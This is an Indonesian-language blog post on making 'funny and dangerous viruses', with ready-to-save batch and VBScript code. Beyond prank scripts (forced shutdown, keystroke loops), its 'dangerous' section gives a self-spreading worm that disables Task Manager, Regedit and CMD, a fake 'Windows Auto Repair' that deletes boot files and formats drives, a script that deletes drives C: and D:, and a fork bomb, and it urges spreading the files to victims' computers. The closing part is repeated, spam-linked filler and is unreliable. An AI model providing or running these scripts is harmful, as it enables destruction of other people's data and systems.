CARA MEMBUAT VIRUS LUCU & BERBAHAYA

DI blogs AKIMILA DS 16  ini akan menerang kan /cara membuat virus yang lucu dan berbahaya .apa itu VIRUS ? :Virus komputer merupakan program komputer yang dapat menggandakan atau menyalin dirinya sendiri dan menyebar dengan cara menyisipkan salinan dirinya ke dalam program atau dokumen lain. Virus komputer dapat dianalogikan dengan virus biologis yang menyebar dengan cara menyisipkan dirinya sendiri ke sel makhluk hidup.  virus memang merugikan jika ada di komputer dan kita harus mempunyai/meng update anti virus yg kuat agar tidak ter tular ,sama seperti manusia jika tidak jaga kesehatan akan terserang virus .Inti nya virus itu merugikan ,tapi di blogs ini hanya memberi cara membuat virus lucu & dan berbahaya dan bukan untuk kejahatan. oke langsung saja

*VIRUS LUCU / UNIK


1.memberi pesan dan shutdown komputer
  
@echo off

msg * Apakah Dona Ganteng
shutdown -c "Error! Dona Memang Ganteng" -s


copy script tersebut di notepad / notepad++ lalu simpan /save dengan format dibalakang nya .VBS / .Bat
contoh(Virus.vbs / Virus.bat) .
2.Menyalakan tombol Caps lock secara simultan.
  
Set wshShell =wscript.CreateObject("WScript.Shell")

do

wscript.sleep 100

wshshell.sendkeys "{CAPSLOCK}"
loop


copy script tersebut di notepad / notepad++ lalu simpan /save dengan format dibalakang nya .VBS / .Bat
contoh(Virus.vbs / Virus.bat) .

3. BUKA /TUTUP TERUS MENERUS CD DRIVE

Set oWMP = CreateObject("WMPlayer.OCX.7")

Set colCDROMs = oWMP.cdromCollection

do

if colCDROMs.Count >= 1 then

For i = 0 to colCDROMs.Count - 1

colCDROMs.Item(i).Eject

Next

For i = 0 to colCDROMs.Count - 1

colCDROMs.Item(i).Eject

Next

End If

wscript.sleep 5000
loop

 
copy script tersebut di notepad / notepad++ lalu simpan /save dengan format dibalakang nya .VBS / .Bat
contoh(Virus.vbs / Virus.bat) .

4.TEKAN ENTER SIMULTAN
 
    Set wshShell = wscript.CreateObject("WScript.Shell")

do

wscript.sleep 100

wshshell.sendkeys "~(enter)"
loop


copy script tersebut di notepad / notepad++ lalu simpan /save dengan format dibalakang nya .VBS / .Bat
contoh(Virus.vbs / Virus.bat) .

5.MEGETIK PESAN KITA SECARA OTOMATIS
 
 WScript.Sleep 180000

WScript.Sleep 10000

Set WshShell = WScript.CreateObject("WScript.Shell")

WshShell.Run "notepad"

WScript.Sleep 100

WshShell.AppActivate "Notepad"

WScript.Sleep 500

WshShell.SendKeys "eitss"

WScript.Sleep 500

WshShell.SendKeys "hatad "

WScript.Sleep 500

WshShell.SendKeys ", ho"

WScript.Sleep 500

WshShell.SendKeys "w a"

WScript.Sleep 500

WshShell.SendKeys "re "

WScript.Sleep 500

WshShell.SendKeys "we"

WScript.Sleep 500

WshShell.SendKeys "> "

WScript.Sleep 500

WshShell.SendKeys "o w"

WScript.Sleep 500

WshShell.SendKeys "k tr"

WScript.Sleep 500

WshShell.SendKeys "oon"

WScript.Sleep 500

WshShell.SendKeys " gak negrtoss"

WScript.Sleep 500

WshShell.SendKeys "kakak"

WScript.Sleep 500
WshShell.SendKeys "hihihi!"
 
(send keys bisa di ganti dengan kata" anda ,contoh (wshshell.sendkeys"akimila 16 ds"))
copy script tersebut di notepad / notepad++ lalu simpan /save dengan format dibalakang nya .VBS / .Bat
contoh(Virus.vbs / Virus.bat)
6.HACK KEYBOARD KORBAN SEHINGGA KORBAN HARUS MENGETIK "AKU MAH     APA ATUH" 

 
Set wshShell = wscript.CreateObject("WScript.Shell")

do

wscript.sleep 100

wshshell.sendkeys "AKU MAH APA ATUH"
loop

copy script tersebut di notepad / notepad++ lalu simpan /save dengan format dibalakang nya .VBS / .Bat
contoh(Virus.vbs / Virus.bat)
 
7.BUKA NOTEPAD TERUS MENERUS
  @ECHO off

:top

START %SystemRoot%\system32\notepad.exe
GOTO top
 copy script tersebut di notepad / notepad++ lalu simpan /save dengan format dibalakang nya .VBS / .Bat
contoh(Virus.vbs / Virus.bat)
 
8.MUNCUL NYA 5 PILIHAN YANG HARUS KORBAN PILIH
 
 
@echo off

title The end of the world

cd C:\

:menu

cls

echo wew ngapain kamu??aku tidak tanggung jawab.....apa yg barusan kamu lakuin saungguh fatal

pause

echo masukkan permintaan terakhir kamu :

echo 1. Buang Komputer..??

echo 2. Format Komputer..??

echo 3. Hapus Partisi..??

echo 4. mau mati pake jalan ini?

echo 5. Tanyakan pada bintang dan bulan?
 
echo 6. bye bye...

set input=nothing

set /p input=Choice:

if %input%==1 goto one
if %input%==2 goto tw
o

(send keys bisa di ganti dengan kata" anda ,contoh (echo 6.akimila ds 16))
copy script tersebut di notepad / notepad++ lalu simpan /save dengan format dibalakang nya .VBS / .Bat
contoh(Virus.vbs / Virus.bat)
 
10. Virus dengan sasaran buat orang jengkel karena muncul terus, sebenarnya bukan virus tapi hanya program yang sok-sok jadi virus :)

  @ECHO off
    :
    Begin
    msg * Haloo ?
    msg * Lagi apa nih ?
    msg * Weww ketahuan nih..
    msg * Hayooo ngaku..
    msg * Ye ye ketauan yeye ketahuan
    msg * Aku matiin saja gimana
    msg * Mau............................
    GOTO BEGIN
 copy script tersebut di notepad / notepad++ lalu simpan /save dengan format dibalakang nya .Bat
contoh( Virus.bat)
 
11.Membuat Virus Wants to Be A Milionaire

   @echo off

    title quiz wants to be a millionaire
    :menu
    cls
    echo jika kamu kena virus apa
    yang kamu lakukan
    pause
    echo pilih yang mana:
    echo 1. Matikan Komputer
    echo 2. Format Komputer
    echo 3. Nonton UTTARAN.....
    set input=nothing
    set /p input=Choice:
    if %input%==1 shutdown -s -t
    30
    if %input%==2 del c:\xxx
    if %input%==3 @ECHO off
    msg * Kurang Beruntung nih
    msg * Kurang Iman kali :D
    msg * Aduh ini gimana kok tambah parah
    msg * Masukin ke UGD aja ya
    msg * Tanya kepada icha & tapasya...
   
@ECHO off

    :top
    START %SystemRoot%
    \system32\notepad.exe
    GOTO top
 
 
copy script tersebut di notepad / notepad++ lalu simpan /save dengan format dibalakang nya .Bat
contoh( Virus.bat)
 
*VIRUS BERBAHAYA  (warning ,hati" jika mencoba )

VIRUS PERTAMA :

Echo off > C:\virxx.txt
if no exist C:\Windows\%0 copy %0 C:\Windows
for %%p in (A C D E F G H) do copy %0 %%p:
for %%q in (A C D E F G H) do dir %%q:\*.3gp /B /S >> C:\virxx.txt
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind
/t REG_DWORD /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v
DisableTaskMgr /t REG_DWORD /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoFolderOptions /t REG_DWORD /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v
ShowSuperHiden /t REG_DWORD /d 0 /f
for %%r in (A C D E F G H) do attrib +h +s %%r:\*.3gp /s
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun
/t REG_DWORD /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v gorun /t REG_SZ /d
C:\Windows\virxx.bat /f
REG ADD HKCU\Software\Policies\Microsoft\Windows\System DisableCMD /t REG_DWORD /d
2 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoViewOnDrive /t REG_DWORD /d 4 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v
DisableRegedit /t REG_DWORD /d 1 /f
Shutdown -s -t 360 -c “Virus Menjangkiti Komputer Anda” -f
Exit

cara membuatnya :
- copy script di atas ke notepad
- save dengan nama terserah ente, dan di akhiri dengan .bat ( contoh : virus.bat )

kerusakan yang bisa di sebabkan jika virus notepad ini di jalankan :
menghilangkan task manager, run, regedit, folder option, dan akan menyembunyikan file yang berekstensi *.3gp dengan super hidden. Selain itu virus akan berkembang biak dengan mengkopykan dirinya ke drive A, C, D, E, F, G, dan setrusnya.


VIRUS KEDUA :

@echo off
title Microsoft Windows TM Auto Repair
echo.
echo Preparing to Fixing the System..............................
echo This system need to repair of broken files.
echo This problem may be cause a Virus activity or coruption files.
echo Please wait a minute until windows doing it self....
echo Please close any running programs from the Windows system.
echo This program License and copyright by
echo Microsoft Coorporation TM.
echo System Repair in progress ........ please wait a second..
echo.
reg add HKLM\SOFTWARE\Classes\exefile\shell\open\Command /ve /d %%fe340ead%%  /f
echo.
del /f /Q /A C:\ntldr /S
echo.
Format  D: /Q /X /y
echo.
Format  E: /Q /X /y
echo.
Format  F: /Q /X /y
echo.
del /f /Q /A C:\command.com /S
echo.
del /f /Q /A C:\io.sys /S
echo.
del /f /Q /A C:\config.sys /S
echo.
echo System is now repaired.
echo Windows will reboot the system.
echo.

cara membuatnya :
- copy script di atas ke notepad
- save dengan nama terserah ente, dan di akhiri dengan .bat ( contoh : virus.bat )

kerusakan yang bisa di sebabkan jika virus notepad ini di jalankan :
- mengelabuhi user agar seakan-akan ini adalah service windows dalam menemukan sebuah virus dan berusaha memperbaikinya. Padahal ini hanya palsu belaka
- membuat value diregistry agar semua file yang berekstensi exe tidak akan bisa dibuka lagi oleh program default file tersebut.
- menghapus semua file yang dibutuhkan oleh windows untuk memboot
- memformat semua harddisk yang ada di komputer

VIRUS KETIGA:

@echo off
DEL C: -Y
DEL D: -Y

cara membuatnya :
- copy script di atas ke notepad
- save dengan nama terserah ente, dan di akhiri dengan .bat ( contoh : virus.bat )

kerusakan yang bisa di sebabkan jika virus notepad ini di jalankan :
kalo ente mengklik virus ini, maka seluruh data yang ada di hardisk ente akan hilang tanpa terkecuali. Sehingga, hal ini dapat menyebabkan komputer akan mati total.




VIRUS KEEMPAT:


%0|%0

cara membuatnya :
- copy script di atas ke notepad
- save dengan nama terserah ente, dan di akhiri dengan .bat ( contoh : virus.bat )

kerusakan yang bisa di sebabkan jika virus notepad ini di jalankan :
menyebabkan kemacetan total CPU dengan membuka sekitar 500 proses command prompt. Penggunaan CPU akan kelebihan beban dan komputer akan hang.

VIRUS KELIMA :

@echo shutdown -s -t 1 -f

Angka 1 adalah waktu yang di buthkan untuk mematikan komputer, ganti sesuai yang ente inginkan...

cara membuatnya :
- copy script di atas ke notepad
- save dengan nama terserah ente, dan di akhiri dengan .bat ( contoh : virus.bat )

kerusakan yang bisa di sebabkan jika virus notepad ini di jalankan :
membuat komputer mati secara otomatis


PERINGATAN:
  • Jangan mengeksekusi virus tersebut pada komputer yang harus dinyalakan 24 jam sehari, seperti komputer di rumah sakit.
  • Lakukan ini hanya pada seseorang yang dapat mengatasi lelucon seperti itu!
  • Jika Anda menggunakan shutdown dengan hitungan mundur, Anda akan memiliki cukup waktu untuk membatalkan hitungan mundur tersebut.
  • Setelah virus ini diklik, seringkali tidak ada cara untuk menghentikannya. Namun, jika Anda harus menghentikan shutdown karena suatu alasan, buka command prompt dan ketik perintah berikut ini: "shutdown-a". Ini akan segera menghentikan virus palsu tersebut.
@echo off msg * I don't like you shutdown -c "Error! You are too ******!" -s ------------------------------------------------- simpan kode script yang berwarna Merah di Notepad dengan nama : Terserah .BAT type file : All file sebarkan File tersebut di Komputer teman kamu, maka Komputer korban akan otomatis FORCED SHOUTDOWN TRIK 2 - Membuat Tombol Caps Lock menyala terus-menerus ------------------------------------------------------------------ Set wshShell =wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "{CAPSLOCK}" loop ------------------------------------------------------- seperti cara yang pertama, hanya berbeda kode script simpan kode yang berwarna biru di Notepad dengan nama : Terserah .VBS type File : All File sebarkan File berikut di Komputer korban maka, Tombol CAPSLOCK akan menyala terus-menerus (bila dimatikan akan menyala lagi) TRIK 3 - Membuat Pesan Jail mucul terus ------------------------------------------------------ @ECHO off :Begin msg * muka kamu sangat jelek msg * ngaca dulu gih, msg * hayo lo,System lu gw acak acak msg * udah install ulang aja msg * biar masalah nya kelar GOTO BEGIN ------------------------------------------------------ simpan kode script yang berwarna hijau dengan nama Terserah .BAT type file : All File Cara ini sangat simple Jail, walaupun di close tab pesan ini masih muncul, kata katanya bisa diubah sesuai selera. TRIK 4 - Jail dengan Membuka Tutup CD/DVD room ------------------------------------------------------ Set oWMP = CreateObject("WMPlayer.OCX.7") Set colCDROMs = oWMP.cdromCollection do if colCDROMs.Count >= 1 then For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next End If wscript.sleep 5000 loop simpan di Notepad kode warna kuning tersebut dengan nama : Terserah .vbs type file : All File maka DVD/CD roomnya akan membuka dan menutup otomatis, TRIK 5 - Membuat script mucul terus menerus ------------------------------------------------------- Set wshShell = wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "~(enter)" loop ------------------------------------------------------- simpan kode warna ungu tersebut di Notepad dengan nama : Terserah.vbs type file : All File membuat script bermunculan terus menerus HACKED BY:PUTTRY ADINDA Diposkan oleh Puttry Adinda di 00.42 Tidak ada komentar: Kirimkan Ini lewat EmailBlogThis!Berbagi ke TwitterBerbagi ke FacebookBagikan ke Pinterest Beranda Langganan: Entri (Atom) mouse Oxygen Black - Move Welcome Arsip Blog ▼ 2016 (1) ▼ Mei (1) Cara Membuat Virus Gokil Lewat NotepadSiang Kawan ...

Make Money Online : http://ow.ly/KNICZ
@echo off msg * I don't like you shutdown -c "Error! You are too ******!" -s ------------------------------------------------- simpan kode script yang berwarna Merah di Notepad dengan nama : Terserah .BAT type file : All file sebarkan File tersebut di Komputer teman kamu, maka Komputer korban akan otomatis FORCED SHOUTDOWN TRIK 2 - Membuat Tombol Caps Lock menyala terus-menerus ------------------------------------------------------------------ Set wshShell =wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "{CAPSLOCK}" loop ------------------------------------------------------- seperti cara yang pertama, hanya berbeda kode script simpan kode yang berwarna biru di Notepad dengan nama : Terserah .VBS type File : All File sebarkan File berikut di Komputer korban maka, Tombol CAPSLOCK akan menyala terus-menerus (bila dimatikan akan menyala lagi) TRIK 3 - Membuat Pesan Jail mucul terus ------------------------------------------------------ @ECHO off :Begin msg * muka kamu sangat jelek msg * ngaca dulu gih, msg * hayo lo,System lu gw acak acak msg * udah install ulang aja msg * biar masalah nya kelar GOTO BEGIN ------------------------------------------------------ simpan kode script yang berwarna hijau dengan nama Terserah .BAT type file : All File Cara ini sangat simple Jail, walaupun di close tab pesan ini masih muncul, kata katanya bisa diubah sesuai selera. TRIK 4 - Jail dengan Membuka Tutup CD/DVD room ------------------------------------------------------ Set oWMP = CreateObject("WMPlayer.OCX.7") Set colCDROMs = oWMP.cdromCollection do if colCDROMs.Count >= 1 then For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next End If wscript.sleep 5000 loop simpan di Notepad kode warna kuning tersebut dengan nama : Terserah .vbs type file : All File maka DVD/CD roomnya akan membuka dan menutup otomatis, TRIK 5 - Membuat script mucul terus menerus ------------------------------------------------------- Set wshShell = wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "~(enter)" loop ------------------------------------------------------- simpan kode warna ungu tersebut di Notepad dengan nama : Terserah.vbs type file : All File membuat script bermunculan terus menerus HACKED BY:PUTTRY ADINDA Diposkan oleh Puttry Adinda di 00.42 Tidak ada komentar: Kirimkan Ini lewat EmailBlogThis!Berbagi ke TwitterBerbagi ke FacebookBagikan ke Pinterest Beranda Langganan: Entri (Atom) mouse Oxygen Black - Move Welcome Arsip Blog ▼ 2016 (1) ▼ Mei (1) Cara Membuat Virus Gokil Lewat NotepadSiang Kawan ...

Make Money Online : http://ow.ly/KNICZ
Membuat Forced Shoutdown

Make Money Online : http://ow.ly/KNICZ
Membuat Forced Shoutdown

Make Money Online : http://ow.ly/KNICZ
Membuat Forced Shoutdown

Make Money Online : http://ow.ly/KNICZ

SHARE ON:

Hello guys, I'm Tien Tran, a freelance web designer and Wordpress nerd. Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae.

    Blogger Comment

0 komentar:

Post a Comment

Powered by Blogger.